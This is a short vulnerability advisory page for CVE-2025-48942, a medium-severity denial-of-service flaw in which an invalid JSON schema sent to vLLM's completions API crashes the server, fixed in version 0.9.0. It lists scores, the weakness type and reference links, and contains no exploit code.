CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!

CVE-2025-48942: vLLM DOS: Remotely kill vllm over http with invalid JSON schema

6.5 CVSS

Description

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.

Classification

CVE ID: CVE-2025-48942

CVSS Base Severity: MEDIUM

CVSS Base Score: 6.5

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Problem Types

CWE-248: Uncaught Exception

Affected Products

Vendor: vllm-project

Product: vllm

Exploit Prediction Scoring System (EPSS)

EPSS Score: 0.05% (probability of being exploited)

EPSS Percentile: 14.01% (scored less or equal to compared to others)

EPSS Date: 2025-06-18 (when was this score calculated)

References

https://nvd.nist.gov/vuln/detail/CVE-2025-48942
https://github.com/vllm-project/vllm/security/advisories/GHSA-6qc9-v4r8-22xg
https://github.com/vllm-project/vllm/issues/17248
https://github.com/vllm-project/vllm/pull/17623
https://github.com/vllm-project/vllm/commit/08bf7840780980c7568c573c70a6a8db94fd45ff

Timeline